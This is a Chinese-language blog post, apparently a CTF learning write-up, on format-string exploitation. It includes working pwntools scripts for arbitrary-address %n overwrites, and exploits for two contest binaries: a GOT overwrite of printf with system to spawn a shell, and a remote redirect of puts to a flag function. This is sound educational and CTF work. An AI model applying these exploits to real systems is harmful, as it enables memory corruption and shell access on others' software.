<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="pwn formatString,">










<meta name="description" content="昨天看了看格式化字符串漏洞的一些基本内容，今天一方面补全了一下知识，另一方面也做了个题目来练手。 覆盖任意地址首先来看看昨天没有搞完的覆盖内存，昨天我们成功覆盖了栈上的内存改变了局部变量c的值，让程序执行到了我们想要的结果，那程序中还有两个变量a、b（a、b为初始化的全局变量，存储在data段，并不在栈上，详情请看上一篇），能不能将他们的值也改变呢？ 当然可以了，这就是我们内存覆盖的第二个方面—任">
<meta name="keywords" content="pwn formatString">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn学习（5）格式化字符串漏洞2">
<meta property="og:url" content="http://yoursite.com/2018/11/20/pwn学习（5）格式化字符串漏洞2/index.html">
<meta property="og:site_name" content="Asa9ao">
<meta property="og:description" content="昨天看了看格式化字符串漏洞的一些基本内容，今天一方面补全了一下知识，另一方面也做了个题目来练手。 覆盖任意地址首先来看看昨天没有搞完的覆盖内存，昨天我们成功覆盖了栈上的内存改变了局部变量c的值，让程序执行到了我们想要的结果，那程序中还有两个变量a、b（a、b为初始化的全局变量，存储在data段，并不在栈上，详情请看上一篇），能不能将他们的值也改变呢？ 当然可以了，这就是我们内存覆盖的第二个方面—任">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://ws2.sinaimg.cn/large/006tNbRwly1fxeuemhwz8j30om0g8tb6.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tNbRwly1fxexaabnswj30wm0ekq5s.jpg">
<meta property="og:image" content="https://ws4.sinaimg.cn/large/006tNbRwly1fxexeowvb4j30cy06m74u.jpg">
<meta property="og:updated_time" content="2018-11-21T11:23:20.380Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="pwn学习（5）格式化字符串漏洞2">
<meta name="twitter:description" content="昨天看了看格式化字符串漏洞的一些基本内容，今天一方面补全了一下知识，另一方面也做了个题目来练手。 覆盖任意地址首先来看看昨天没有搞完的覆盖内存，昨天我们成功覆盖了栈上的内存改变了局部变量c的值，让程序执行到了我们想要的结果，那程序中还有两个变量a、b（a、b为初始化的全局变量，存储在data段，并不在栈上，详情请看上一篇），能不能将他们的值也改变呢？ 当然可以了，这就是我们内存覆盖的第二个方面—任">
<meta name="twitter:image" content="https://ws2.sinaimg.cn/large/006tNbRwly1fxeuemhwz8j30om0g8tb6.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/11/20/pwn学习（5）格式化字符串漏洞2/">





  <title>pwn学习（5）格式化字符串漏洞2 | Asa9ao</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Asa9ao</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/11/20/pwn学习（5）格式化字符串漏洞2/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Asa9ao">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Asa9ao">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">pwn学习（5）格式化字符串漏洞2</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-11-20T19:36:28+08:00">
                2018-11-20
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index">
                    <span itemprop="name">pwn</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>昨天看了看格式化字符串漏洞的一些基本内容，今天一方面补全了一下知识，另一方面也做了个题目来练手。</p>
<h2 id="覆盖任意地址"><a href="#覆盖任意地址" class="headerlink" title="覆盖任意地址"></a>覆盖任意地址</h2><p>首先来看看昨天没有搞完的覆盖内存，昨天我们成功覆盖了栈上的内存改变了局部变量c的值，让程序执行到了我们想要的结果，那程序中还有两个变量a、b（a、b为初始化的全局变量，存储在data段，并不在栈上，详情请看上一篇），能不能将他们的值也改变呢？</p>
<p>当然可以了，这就是我们内存覆盖的第二个方面—任意地址内存覆盖</p>
<h3 id="覆盖小数字"><a href="#覆盖小数字" class="headerlink" title="覆盖小数字"></a>覆盖小数字</h3><p>我们分析程序认识到，我要想输出想要的结果，我们需要把a的值设置为2，b的值设置为0x12345678，那么问题就来了，我们上一次提到的%n是将“打印的个数”写入某个地址，一般的格式是</p>
<pre><code>addr + %n$n 
</code></pre><p>而addr作为一个地址长度已经是4了，难道说我们覆盖的最小值只能是4？那当然不是了，我们可以构造下面形式的payload：</p>
<pre><code>aa%k$nxx + addr
</code></pre><p>是不是和刚才的有些不一样？这有什么玄机呢？其实很简单，我们之前构造payload时，是找到了我们输入的第一个四个字节所在的栈上的位置进而写入，那么我们也完全可以找到我们输入的第二个四个字节所在的位置（这个位置一想就知道了，就是我们之前找的那个偏移再+1）写入，以此类推。</p>
<p>上面的字符串其实首先拿aa作为填充字符，和%k凑了四个字节，然后拿$n和xx凑了四个字节，最后的是addr，那addr在栈上的位置也就是原来的偏移6  + 2 也就是8，所以我们的k就是8。万事具备，那我们就上脚本了：</p>
<pre><code>p = process(&apos;./overwrite.dms&apos;)
a_addr = 0x804A024
payload = &apos;aa%8$naa&apos; + p32(a_addr)
p.sendline(payload)
print p.recv()
p.interactive()
</code></pre><h3 id="覆盖大数字"><a href="#覆盖大数字" class="headerlink" title="覆盖大数字"></a>覆盖大数字</h3><p>具体原理就不再博客上放了（我也没信心说明白，可以参考ctf wiki，毕竟咱们不能做脚本小子），给一个pwntools给出的函数来一步实现</p>
<pre><code>payload = fmtstr_payload(offset, {addr:data})
</code></pre><p>这里的offset也就是咱们求出来的偏移值，addr是你想写入的地址，而data是你想写入的数据。<br>这样我们也可以很轻松的覆盖掉b的值，使程序执行到我们想要的地方，脚本如下</p>
<pre><code>p = process(&apos;./overwrite.dms&apos;)
b_addr = 0x804A028
payload = fmtstr_payload(6, {b_addr:0x12345678})
p.sendline(payload)
#print p.recv()
p.interactive()
</code></pre><h2 id="自动化寻找偏移值"><a href="#自动化寻找偏移值" class="headerlink" title="自动化寻找偏移值"></a>自动化寻找偏移值</h2><p>Pwntools中同样给出了自动化寻找偏移值的方法，不过还是要在重复一遍，还是要搞明白之前讲的原理，毕竟咱们的目的不是做个脚本小子</p>
<pre><code>def getoffset(payload):
    p = process(&quot;./overwrite.dms&quot;)
    p.sendline(payload)
    info = p.recv()
    p.close()
    return info
autofmt = FmtStr(getoffset)
print autofmt.offset
</code></pre><h2 id="题目实战1"><a href="#题目实战1" class="headerlink" title="题目实战1"></a>题目实战1</h2><p>题目是来自iscc2017的第一道pwn题，链接就不放了，很容易找到，还是老规矩，首先拿ida分析一波</p>
<p><img src="https://ws2.sinaimg.cn/large/006tNbRwly1fxeuemhwz8j30om0g8tb6.jpg" alt=""></p>
<p>可以看到在我们输入name后有一个很明显的格式化字符串漏洞。而在程序中没有可以供我们利用的/bin/sh字符串和system函数，那我们就要考虑人为的创造他们了。</p>
<p>/bin/sh字符串好说，因为程序存在输入，我们完全可以直接写进去，但system函数怎么办呢？前面说了利用这个漏洞我们可以实现任意地址的泄漏和写入，那我们可以首先泄漏某个函数的libc地址，然后计算出system的地址写入（因为got表表是可写的）之前的那个函数，这就相当于把之前的函数“变成”了system，拿选谁比较合适呢？当然是printf了，因为printf的参数恰好就是我们输入的字符，那我们把printf代替之后就可以直接执行system(“/bin/sh”)了</p>
<p>思路有了，上exp！</p>
<pre><code>from pwn import *
#context.log_level = &apos;debug&apos;

libc = ELF(&apos;/lib/i386-linux-gnu/libc.so.6&apos;)
elf = ELF(&quot;./pwn1&quot;)
got_printf = elf.got[&apos;printf&apos;]
p = process(&quot;./pwn1&quot;)
p.recvuntil(&quot;input$&quot;)
p.sendline(&apos;1&apos;)
p.recvuntil(&apos;please input your name:\n&apos;)
payload = p32(got_printf) + &quot;%6$s&quot;
p.sendline(payload)
printf_addr_and_xxx = p.recvuntil(&quot;,you&quot;)
printf_addr = u32(printf_addr_and_xxx[4:8])
print &quot;printf_addr = &quot; + hex(printf_addr)
system_addr = printf_addr - (libc.symbols[&apos;printf&apos;] - libc.symbols[&apos;system&apos;])
print &quot;system_addr = &quot; + hex(system_addr)

p.recvuntil(&quot;input$&quot;)
p.sendline(&apos;1&apos;)
p.recvuntil(&apos;please input your name:\n&apos;)

payload2 = fmtstr_payload(6, {got_printf: system_addr})
p.sendline(payload2)

p.sendline(&apos;1&apos;)
p.recvuntil(&apos;please input your name:\n&apos;)
p.sendline(&apos;/bin/sh\0&apos;)

p.interactive()
</code></pre><h2 id="题目实战2"><a href="#题目实战2" class="headerlink" title="题目实战2"></a>题目实战2</h2><p>第二个例题是2018山东省赛的pwn的铜牌题目，题目在学校的平台上有，难度不是很大，首先还是ida看一下</p>
<p><img src="https://ws1.sinaimg.cn/large/006tNbRwly1fxexaabnswj30wm0ekq5s.jpg" alt=""></p>
<p>可以看到很明显是格式化字符串漏洞，再看一下题目还给个getFlag函数能直接显示flag，不过想要执行这个函数还需要number等于0x2018</p>
<p><img src="https://ws4.sinaimg.cn/large/006tNbRwly1fxexeowvb4j30cy06m74u.jpg" alt=""></p>
<p>那思路就有了，我们可以首先改写计数器total count来多次执行这个漏洞，紧接着再利用任意地址覆盖使得number变为0x2018</p>
<p>最后我们找个getFlag函数的“替身”，这里我们可以看到选择</p>
<p>当然在做这些之前还是需要找到偏移的，可以手动也可以直接用之前自动化的脚本，最后的exp如下：</p>
<pre><code>from pwn import *
p = remote(&quot;47.105.148.65&quot;,9999)
count_addr = 0x804A064
num_addr = 0x804A060
put_addr = 0x804A01C
flag_addr = 0x8048616
payload = fmtstr_payload(4,{count_addr:0x3})
p.sendline(payload)
payload = fmtstr_payload(4,{num_addr:0x2018})
p.sendline(payload)
payload = fmtstr_payload(4,{put_addr:flag_addr})
p.sendline(payload)
p.interactive()
</code></pre><p>successful</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn-formatString/" rel="tag"># pwn formatString</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/11/19/pwn学习（4）初识格式化字符串漏洞/" rel="next" title="pwn学习（4）初识格式化字符串漏洞">
                <i class="fa fa-chevron-left"></i> pwn学习（4）初识格式化字符串漏洞
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/11/21/pwn学习（6）花式栈溢出1/" rel="prev" title="pwn学习（6）花式栈溢出1">
                pwn学习（6）花式栈溢出1 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Asa9ao</p>
              <p class="site-description motion-element" itemprop="description">It's not who I am underneath, but it's what I do that defines me</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">22</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#覆盖任意地址"><span class="nav-number">1.</span> <span class="nav-text">覆盖任意地址</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#覆盖小数字"><span class="nav-number">1.1.</span> <span class="nav-text">覆盖小数字</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#覆盖大数字"><span class="nav-number">1.2.</span> <span class="nav-text">覆盖大数字</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化寻找偏移值"><span class="nav-number">2.</span> <span class="nav-text">自动化寻找偏移值</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#题目实战1"><span class="nav-number">3.</span> <span class="nav-text">题目实战1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#题目实战2"><span class="nav-number">4.</span> <span class="nav-text">题目实战2</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Asa9ao</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
